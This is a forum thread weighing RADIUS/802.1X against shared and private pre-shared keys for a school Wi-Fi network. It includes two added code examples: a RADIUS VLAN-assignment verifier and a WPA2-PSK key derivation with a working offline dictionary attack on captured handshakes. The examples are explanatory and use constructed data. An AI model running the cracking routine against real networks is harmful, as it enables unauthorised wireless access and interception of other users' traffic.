Why would I want to set up my WiFi network with a Radius Server?

What are the advantages of using a Radius server? How could this improve my network?

I work at a high school and I have a network of 12 APs, and 220 connected devices (mainly iPads.)

Currently we have one SSID for everyone (faculty and students.) and one password for everyone also.

Please assume I know very little about Radius servers ;)
James Watson

Posted 5 years ago

Brian Ambler
Hi James,

I am by no means the authority on why everyone might or might not want to enable 802.1X/RADIUS authentication in place of WPA/2-PSK, but I will give you my opinion. As I see it, you could have a few benefits by enabling 802.1X/RADIUS on a school network, as well as a few downsides. There are likely many more pros and cons than I list below, but these are the big ones off the top of my head.

Pros:
1) Enhanced security when implemented properly
2) Enhanced reporting and tracking based on client usernames, even more so when tied into an LDAP backend such as Active Directory.
3) Ability to direct Faculty into one User Profile and Students into another based on LDAP membership and/or RADIUS attribute return. This allows you to place restrictions on the Student User Profile/VLAN (if desired) while keeping Faculty members unrestricted.

Cons:
If users are connecting to the wireless network with personal devices, 802.1X/RADIUS can be more complex/difficult for most end users to configure, especially on Windows clients. Domain-joined devices can easily be pre-configured, avoiding this potential hassle.

These are what I can think of at the moment, but I'm sure others on the community will be able to expand on this list.

Hope this helps
Abby S, Employee
Hi James, just to support what Brian said, there are lots of cool reasons to use RADIUS to secure your wireless instead of a pre-shared key.

1. When a user authenticates to an SSID using 802.1X, that individual session is encrypted uniquely between the user and access point. This means that another user connected to the same SSID cannot sniff the traffic and acquire information because they will have a different encryption key for their connection. With a PSK network, every device connected to the access point is on a "shared encryption" connection so they can all see each other's traffic if they choose to do so.

2. If you need to de-auth a particular user or device, having RADIUS makes this much easier because you can disconnect a single user or device without having to change the key for everyone, or allow the potential security risk of that user re-joining the network with the known access key.

3. You can assign network permissions such as VLAN, firewall policy (including application permissions), QoS settings, tunneling policies, schedules - everything within a user profile can be dynamically assigned to users based on their identity. With a pre-shared key, you only get a single user profile that everyone shares. When you use 802.1X, you can assign different permissions based on the attribute returned from the RADIUS server (so as Brian said above, assign a different VLAN, maybe different application restrictions and firewall policies for faculty than students).

Now, with the "Con" that Brian listed above - one other potential solution you may want to look into is Aerohive's unique feature called Private Pre-Shared Key. This allows you to have benefits 1, 2, and 3 that I listed above but without the Con of having to configure a RADIUS server, client supplicants, or certificates on endpoints. More information about PPSK is available on our website if you're interested. The short overview is: a unique pre-shared key can be assigned to a particular user or group of users that distinguishes them from others connected to the same SSID and gives them an individually-encrypted session, you have the ability to de-auth a particular user or key, and you can assign permissions based on the key. :-)
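Abby's point 3 and Brian's pro 3 both rest on the RADIUS server returning attributes that the AP turns into a VLAN assignment. The following is an added example, not code from this thread or from Aerohive: a minimal Access-Accept carrying the RFC 2868 tunnel attributes that RFC 3580 uses for VLAN assignment, and the Response Authenticator check the AP (the RADIUS client, or NAS) must perform before it acts on them. The shared secret, the group-to-VLAN policy, the request identifier and the function names are constructed for the demonstration.

```python
"""Added example (not from the thread or from any vendor): a RADIUS
Access-Accept that assigns a VLAN via the RFC 2868 tunnel attributes
(the RFC 3580 convention), and the Response Authenticator check the AP
must perform before acting on it.  Shared secret, group-to-VLAN policy
and identifiers are constructed for the demonstration."""
import hashlib
import hmac
import os
import struct

ACCESS_ACCEPT = 2                  # RFC 2865 packet codes
ACCESS_REJECT = 3
TUNNEL_TYPE = 64                   # tagged integer, 13 = VLAN
TUNNEL_MEDIUM_TYPE = 65            # tagged integer, 6 = IEEE-802
TUNNEL_PRIVATE_GROUP_ID = 81       # tagged string, the VLAN ID

SHARED_SECRET = b"constructed-shared-secret"      # assumption: per-AP secret
GROUP_TO_VLAN = {"faculty": 10, "students": 20}   # assumption: LDAP group -> VLAN


def tlv(attr_type: int, value: bytes) -> bytes:
    """One RADIUS attribute: Type (1), Length (1, includes header), Value."""
    return struct.pack("!BB", attr_type, 2 + len(value)) + value


def tunnel_attr(attr_type: int, value: bytes, tag: int = 0) -> bytes:
    """Tunnel attributes carry a leading Tag octet (RFC 2868 section 3)."""
    return tlv(attr_type, bytes([tag]) + value)


def build_accept(identifier: int, request_auth: bytes, vlan_id: int,
                 secret: bytes = SHARED_SECRET) -> bytes:
    """Server side.  Response Authenticator =
    MD5(Code | ID | Length | RequestAuth | Attributes | Secret)  (RFC 2865 3)."""
    attrs = (tunnel_attr(TUNNEL_TYPE, struct.pack("!I", 13)[1:])      # 3-byte value
             + tunnel_attr(TUNNEL_MEDIUM_TYPE, struct.pack("!I", 6)[1:])
             + tunnel_attr(TUNNEL_PRIVATE_GROUP_ID, str(vlan_id).encode("ascii")))
    header = struct.pack("!BBH", ACCESS_ACCEPT, identifier, 20 + len(attrs))
    resp_auth = hashlib.md5(header + request_auth + attrs + secret).digest()
    return header + resp_auth + attrs


def parse_attrs(data: bytes):
    """Walk the attribute list, rejecting malformed lengths."""
    attrs, pos = [], 0
    while pos < len(data):
        if pos + 2 > len(data):
            raise ValueError("truncated attribute header")
        attr_type, length = data[pos], data[pos + 1]
        if length < 2 or pos + length > len(data):
            raise ValueError("bad attribute length")
        attrs.append((attr_type, data[pos + 2:pos + length]))
        pos += length
    return attrs


def nas_handle_response(packet: bytes, identifier: int, request_auth: bytes,
                        secret: bytes = SHARED_SECRET):
    """AP side.  Returns the VLAN ID for a verified Access-Accept, or None
    for a reject, a stale/replayed ID, or anything failing the authenticator."""
    if len(packet) < 20:
        return None
    code, ident, length = struct.unpack("!BBH", packet[:4])
    if ident != identifier or length != len(packet):
        return None
    resp_auth, attrs = packet[4:20], packet[20:]
    expected = hashlib.md5(packet[:4] + request_auth + attrs + secret).digest()
    if not hmac.compare_digest(resp_auth, expected):
        return None          # forged or tampered: never fall back to a default VLAN
    if code != ACCESS_ACCEPT:
        return None
    vlan = None
    try:
        for attr_type, value in parse_attrs(attrs):
            if attr_type == TUNNEL_PRIVATE_GROUP_ID:
                # RFC 2868 3.6: a first octet <= 0x1F is the Tag, otherwise
                # it is the first character of the string.
                if value and value[0] <= 0x1F:
                    value = value[1:]
                vlan = int(value.decode("ascii"))
    except (ValueError, UnicodeDecodeError):
        return None
    return vlan


def demo():
    """Round trip for a 'students' user, then the same packet with the
    VLAN string altered in flight by someone who lacks the secret."""
    ident, request_auth = 7, os.urandom(16)   # ID and Request Authenticator the AP sent
    pkt = build_accept(ident, request_auth, GROUP_TO_VLAN["students"])
    genuine = nas_handle_response(pkt, ident, request_auth)
    forged = bytearray(pkt)
    forged[-2:] = b"10"                       # try to move the client to VLAN 10
    return genuine, nas_handle_response(bytes(forged), ident, request_auth)


if __name__ == "__main__":
    print(demo())   # (20, None)
```

The authenticator check is what stops a device on the path between AP and server from handing itself an Access-Accept with a VLAN of its choosing; it is only as strong as the shared secret, so use a long random secret per AP and keep RADIUS on a management VLAN (or use RadSec). For EAP exchanges the server additionally includes a Message-Authenticator attribute (RFC 3579), which this example does not show.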
Frank Sacksen
I want to set up a RADIUS server for the sole purpose of protecting the users from each other. I do not want any hassle with producing user names and passwords. Is it possible to set up a RADIUS server in such a way that the guests will not be asked for any information but will still be given a unique encryption key?
Amanda, Moderator
Hi Frank - can I suggest you start a new thread where someone can help answer your specific question? This is an older, answered thread that is more general in nature and may not get the attention you need.
Shawn Rasmussen
Frank,
RADIUS, by nature, allows you to authenticate against a directory of some kind. Usually the people I have heard of are using it to authenticate to an existing directory service they already have in place, like Active Directory. In this way, you do not have to set up and maintain a separate directory for wireless; you are already doing it.

Talking about Guest users is another matter entirely, since by nature, they are not already a part of your existing directory. If requirements dictate RADIUS, you are going to have to have some kind of setup of directory/database users.

If 802.1x/RADIUS is not specifically dictated, you could look into the PPSK that others have talked about in this thread. I don't have that implemented, but others seem to like it. And I believe there is a component that allows users to self-register and create their own username and password. It's not 802.1x, but it is better than PSK. You can also configure firewall rules and disallow client-to-client communication, which can help protect users from each other.

The reason I didn't implement PPSK with self-registration is that I'm in an environment where the guest wifi is only a nice perk for visitors. We look at it as users shouldn't view it as an absolutely private connection. So we use PSK for guests with a captive portal where they agree to these terms - all on a separate VLAN for guest wifi. For our corporate users, we are using 802.1x on a separate SSID, which I would really encourage more people to look into. 802.1x really was not that hard to configure, and we already had the directory in place.

I realize that a tiered approach may not work for everyone. But for us, it is great.
Frank Sacksen
Shawn,

Thanks a lot for your direction. I will certainly go for PPSK. Though, I have yet to understand why PPSK is less secure than 802.1x/Radius, even after trawling the security sites for information. I assumed it has something to do with the protocol, but even with keywords in this respect I did not find any good information.

I want to tell you I was shocked when I found out that WPA does not offer any protection between users on the same AP. In fact, I did expect the password/key only to have a function as authentication and then an individual key would be constructed. Something tells me that the 802.11* community doesn't care much for security. Even after the WEP crisis they are not able to come up with something that takes care of all the issues. It is really depressing.

Regards

Frank.


Amanda Moderator: Yes, you can suggest, but I think that's the wrong way to go. If you feel this forum can gain anything from a rephrase of my question in a new post, you go ahead producing that post. I do realize this might be a forum run by its members and with no income, but that's no excuse for running it stupidly. You don't have to pardon my low tolerance for what does not make sense. If you think this is too much hostility for my account to remain intact, feel free to delete it. I've just had it with so-called moderators and their tendency to power trip. I'm just a guest. I do not run this forum. You do. This is no over-reaction on my part. The net is filled with forums and moderators who misunderstand their role. That is, if we consider it with the use of reason.
Amanda, Moderator
Hello Frank – It looks like you got a helpful response from someone on our community. Excellent! HiveNation is full of awesome, helpful members who know their stuff and love to share. As always, one of my goals as moderator is to help people get answers to their questions. Often, but not always, a fresh, new thread is the right way to accomplish that. Glad you got the help you needed :-)

Sincerely,

Amanda
James Watson
Thanks Brian, does this setup mean that every user would have their own username and password, which would need to be the same as the one in the LDAP?

What if they had two devices would they need two accounts (e.g. iPad and laptop.)

Has anyone used this in a K12 setting?

Thanks very much.
Brian Ambler
Hi James,

Usually you would implement 802.1X/RADIUS to tie into an LDAP database for ease of use/management, but you could set up a RADIUS server that authenticated based on a separate, local database. Ideally you would design the LDAP or local database so that every individual has their own user identity to take full advantage of what Abby and I mentioned above. However, I suppose you could create generic "Faculty" and "Student" usernames, though I wouldn't really recommend this route.

If an individual has more than one device which they would like to use their LDAP credentials to authenticate against the RADIUS server, this is possible, though you should be able to restrict this depending on the RADIUS server/user database used.

If your main goal is to restrict users to using their LDAP identities on designated devices or only on one device, you could manage this in LDAP (if you own all of the devices in a domain, ex: Active Directory), but you could also utilize PPSK to limit the number of devices on which they can use it.
James Watson
Thank you both very much, I'm going to try the PPSK route. Are there any minimum AP requirements to do this? E.g. Must have at least one AP XXX on the network for this to work.

Thanks again.
Abby S, Employee
Hi James! All Aerohive APs support PPSK :-). Good luck! Interested to hear how you like it once you have it set up!!
Juha Lindstrom
I would also encourage you to try out the PPSK path. It looks like a great fit for your network.

I would also encourage you to think about separating the staff and students into different VLANs, making it easier for you to control their access through the rest of the network. In essence it would make it quite easy to control access in the firewalls when they'd be in separate VLANs and subnets. You can still use just one SSID, but based on the PPSK group (in practice, user profiles) have the AP pass the traffic to different VLANs.

It's a fairly simple setup once you get the hang of it, but would greatly enhance the security of your network. Also you could then play around with schedules in the users profiles to allow wireless access only during the hours/days allowed etc etc.

//Juha
Nick Lowe, Official Rep
I would respectfully dissent here and say that 802.1X is the gold standard to be strived towards, with PPSK the best compromise when it cannot be sensibly implemented for whatever reason.
Abby S, Employee
802.1X/WPA2-Enterprise is absolutely the gold standard of Wi-Fi security. However, in many situations, the daunting task of configuring a RADIUS server (plus returning attributes to assign different user profiles), configuring a CA and installing a certificate on at least the server side if not client side, configuring supplicants to support 802.1X (while this is easier with recent OS updates from all vendors, it is by no means foolproof when dealing with older clients), and then the operational expense of maintaining and troubleshooting a system that involves multiple components deters many folks from implementing what is the most secure way to connect to an SSID. If faced with the choice between a single pre-shared key on an SSID that limits functionality and has very little security, or an amazing Aerohive-patented feature that allows you to have nearly all the advantages of 802.1X (not all. No one disagrees there), I would/will suggest PPSK hands down every single day.
Brian Ambler
While I agree with Nick in that 802.1X is certainly the best and most secure way to lock down an SSID on a network, as Abby mentions, sometimes it is just not possible to implement. This could be for a number of reasons, but regardless of the why, PPSK is definitely my second choice to secure a wireless network.

PPSK combines the ease of use on the end user side while mitigating the security risk of having just one PSK for all wireless users on a network as well as the hassle of having to refresh the entire user base's PSK when needed. Some of the other advantages of 802.1X are available as well, such as attribute return to place different users in user profiles with varying levels of restrictions based on their PPSK group membership.

That being said, I would still recommend 802.1X over PPSK if there is an existing architecture in place to support it or if it is feasible to implement, but I would not blindly insist on one method of authentication without first considering the requirements and constraints of the end user's network. Both 802.1X and PPSK are viable authentication options that, when configured properly, vastly improve upon the insecurities in standard PSK and other legacy authentication types.
James Watson
What happens if the AP acting as the PPSK server goes offline? Are you able to assign a backup? Will the assigned AP still operate as an AP?

Also I can't find the Idiots guide on how to correctly install this setup. Does anyone know where to find this?
Brian Ambler
This is a great conversation that's separate from the main topic, so I created a new topic to continue the discussion if needed. Please reference the new topic here: How to configure PPSK
Brian Ambler
James,

I forked this comment into a new thread to cover the PPSK Configuration How-to I created here, but I wanted to address your first question here as well, as it is also relevant to this conversation.

A PPSK server is only needed if you are choosing to bind one or more MAC addresses to a PPSK or if you wish to configure self-registration. If all you wish to do is have users authenticate with their own PSKs (which is the standard configuration) then all of the APs store the individual PPSK digests. If one of your APs goes down, the wireless clients will be unable to authenticate against that AP, but they can still use any other APs in range.

More information about Private PSK can be found in the help here.
James Watson
Got it, this worked great and was easy to setup (as soon as someone shows you how!)

I'm going to deploy it to my high school which has approximately 240 iPads. I will let you know how it goes. I do have some other questions regarding the configuration, but I am thinking that would be best for another topic.

Thanks again!
Crowdie, Champ
To put my five cents in I look at this problem in two parts:

1.  Authentication
2.  Security

From an authentication point of view if the user accounts exist in a database, such as Active Directory, that RADIUS supports then using 802.1X makes sense.  The users can authenticate to the wireless network using the same credentials they use to authenticate to the wired network and they don't have to remember a separate passphrase.  If the users do not have an account in a database that RADIUS supports then PPSKs are a better authentication method than a standard PSK as each user gets a unique PPSK and each PPSK can be individually revoked if required.

From a security point of view you want to stop people like me being able to access your network without authorisation. 

When you connect to a residential wireless ADSL router you enter a passphrase and somehow you are magically connected.  That passphrase is added to some other information, such as the SSID name, and a key is created.  You actually authenticate to the wireless ADSL router using that key rather than the passphrase.

With a PSK WLAN a single passphrase, and hence key, is used and it never changes.  If a cracker can get that key (or the passphrase that is used to create the key) they now have access to your network.  If you detect the intrusion then you need to change the PSK on the wireless network and every wireless device that is authorised to authenticate to the wireless network.

With a PPSK WLAN a unique passphrase, and hence key, is used for each person and it also never changes.  If a cracker can get that unique key (or the unique passphrase that is used to create the key) they now have access to your network.  If you detect the intrusion then you need to revoke the individual user's PPSK, create a new PPSK for the user and advise the user of the new PPSK.  All other PPSK users are unaffected.

With an 802.1X WLAN each user gets a new unique key each time the user authenticates to the wireless network with their user account credentials (rather than a separate passphrase).  This key continuously changes while the user is authenticated to the wireless network.  If it takes a cracker one hour to crack the key but the key is regenerating every thirty minutes then by the time the cracker has the key it is useless to him/her.  From a security point of view I see this as one of the major advantages of 802.1X over PSK/PPSK.

This is a very basic overview but if you would like to learn more about wireless security then I strongly recommend David Coleman's excellent Certified Wireless Security Professional official study guide (http://www.cwnp.com/certifications/cwsp/).

Nick Lowe, Official Rep
Crowdie,

Yes, absolutely, but the salient consideration is that it is entirely moot where no brute force is required because certificate validation is not taking place. All PSKs are 'stronger' than that, despite many being weak from a security perspective. That's my point... :)

Nick
Crowdie, Champ

Agreed on the certificate validation but as I have said a few times during this discussion get a wireless professional to configure the 802.1X.

If you have a PSK WLAN and a nasty gets access to a corporate laptop (staff member leaves it on the back seat of their car, for example) then they have the passphrase due to Microsoft's wonderful "Show characters" option in, and this always makes me laugh, the "Security" tab of the wireless profile. 

Nick Lowe, Official Rep
Yup! Conceptually though, that is no different to lifting an EAP's credentials. That's where you have to start looking at the integrity of the client. Proper lock down, encryption etc...

Practically, yes, lifting a PSK is easier.
J. Goodnough, Champ
Crowdie: a quick look at the aircrack-ng docs indicate that their only attack on wpa2 is a dictionary/bruteforce attack. WPA2 is not broken, as Nick pointed out.
Crowdie, Champ
My apologies for the late reply but I have had two funerals to attend in the last three days.

I probably should have been more precise in my description, but I was more trying to answer the original question than get into a low-level discussion on 802.11 security. If you deploy a PSK WLAN with access to the corporate LAN and it is compromised, the customer is not going to care if the attack was at protocol level or a brute force attack. All they care about is that their wireless network was compromised and you configured it.

There may, however, be a possible solution.  As Nick has stated the trick to making a PSK hard to crack is to make the passphrase as long and complex as possible.  A 63 character passphrase consisting of letters (capitals and smalls), numbers and special characters could take 20+ years to crack with current technology.  However, it is not realistic to expect users, especially smartphone users, to manually enter 63 character complex passphrases.  The "ease of use" requirement almost always takes precedence over the security issue and passphrases with lengths between eight and twelve characters are deployed.

When Aerohive released the Client Management product the first thing I saw was a solution to the issue.  However, the licensing for Client Management makes this financially unrealistic.  If we could get a Private PSK deployment system, as Ruckus has, that isn't expensive we have an excellent solution.
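Crowdie's earlier post describes the PSK key schedule in outline (passphrase plus SSID becomes a key; the key then authenticates the client), J. Goodnough notes that aircrack-ng's only attack on WPA2 is a dictionary or brute-force one, and the post above weighs passphrase length against crack time. The following is an added example, not code from this thread or from any vendor or tool mentioned in it, that carries the WPA2-Personal key schedule through in code: PMK from PBKDF2-HMAC-SHA1 over passphrase and SSID, the per-session PTK from the 4-way handshake inputs, the EAPOL MIC under the KCK, and a wordlist check that uses the captured MIC as its offline oracle. It also makes Frank's observation concrete: a per-session key does exist under PSK, but anyone who knows the passphrase and sniffs the handshake can reproduce it. The SSID, MAC addresses, nonces, EAPOL frame, passphrase and wordlist are constructed for the demonstration; the "password"/"IEEE" pair checked in the test is the published IEEE 802.11i test vector.

```python
"""Added example (not from the thread): the WPA2-Personal key schedule
carried through.  PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 32 bytes);
the per-session PTK comes from PMK, both MAC addresses and both handshake
nonces; the EAPOL MIC is HMAC-SHA1-128 under the first 16 bytes of the PTK
(the KCK).  SSID, MACs, nonces, EAPOL frame and wordlist are constructed."""
import hashlib
import hmac

SSID = "school-wifi"                          # constructed
AA = bytes.fromhex("0a1b2c3d4e5f")            # AP (authenticator) MAC, constructed
SPA = bytes.fromhex("0212ab34cd56")           # client (supplicant) MAC, constructed
ANONCE = bytes(range(32))                     # constructed; real nonces are random
SNONCE = bytes(range(32, 64))
# EAPOL-Key message 2 with its 16-byte MIC field zeroed (99 bytes):
# ver|type|len | desc|keyinfo|keylen|replay(8)|nonce(32)|iv(16)|rsc(8)|id(8)|mic(16)|datalen(2)
EAPOL_M2 = (b"\x02\x03\x00\x5f" + b"\x02\x01\x0a\x00\x00" + b"\x00" * 8
            + SNONCE + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8
            + b"\x00" * 16 + b"\x00\x00")


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """IEEE 802.11 passphrase-to-PSK mapping (8..63 printable ASCII chars)."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrase must be 8 to 63 characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               ssid.encode("utf-8"), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11 PRF-n: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..."""
    out, i = b"", 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK for CCMP is 48 bytes: KCK (16) | KEK (16) | TK (16).  Every input
    except the PMK is sent in the clear, so the PMK is the only secret."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)


def eapol_mic(kck: bytes, frame_with_mic_zeroed: bytes) -> bytes:
    """AKM 00-0F-AC:2 (PSK): MIC = HMAC-SHA1 truncated to 16 bytes."""
    return hmac.new(kck, frame_with_mic_zeroed, hashlib.sha1).digest()[:16]


def capture_handshake(passphrase: str) -> dict:
    """What a passive sniffer gets from a client's 4-way handshake: both MACs,
    both nonces, the EAPOL frame and its MIC."""
    kck = derive_ptk(pmk_from_passphrase(passphrase, SSID), AA, SPA, ANONCE, SNONCE)[:16]
    return {"aa": AA, "spa": SPA, "anonce": ANONCE, "snonce": SNONCE,
            "eapol": EAPOL_M2, "mic": eapol_mic(kck, EAPOL_M2)}


def mic_matches(candidate: str, cap: dict, ssid: str) -> bool:
    """The offline oracle: does this passphrase reproduce the captured MIC?
    With the real passphrase this is also how a second user on the same
    PSK network recovers a neighbour's PTK and so their traffic key."""
    try:
        pmk = pmk_from_passphrase(candidate, ssid)
    except ValueError:
        return False
    kck = derive_ptk(pmk, cap["aa"], cap["spa"], cap["anonce"], cap["snonce"])[:16]
    return hmac.compare_digest(eapol_mic(kck, cap["eapol"]), cap["mic"])


def dictionary_attack(cap: dict, ssid: str, wordlist):
    """One PBKDF2 run (4096 HMAC-SHA1 rounds) per guess; there is no shortcut,
    which is why passphrase length and entropy are the whole defence."""
    for candidate in wordlist:
        if mic_matches(candidate, cap, ssid):
            return candidate
    return None


def demo():
    cap = capture_handshake("Welcome2019")             # constructed network passphrase
    guesses = ["password", "letmein1", "short", "Welcome2019", "Summer2020!"]
    return dictionary_attack(cap, SSID, guesses)       # "Welcome2019"


if __name__ == "__main__":
    print(demo())
```

Under 802.1X the PMK is instead produced by the EAP method for each session, so there is no passphrase to guess from a captured handshake; the weak spot moves to the supplicant, which, as Nick notes above, must validate the server certificate or it will hand its credentials to any AP that presents the right SSID.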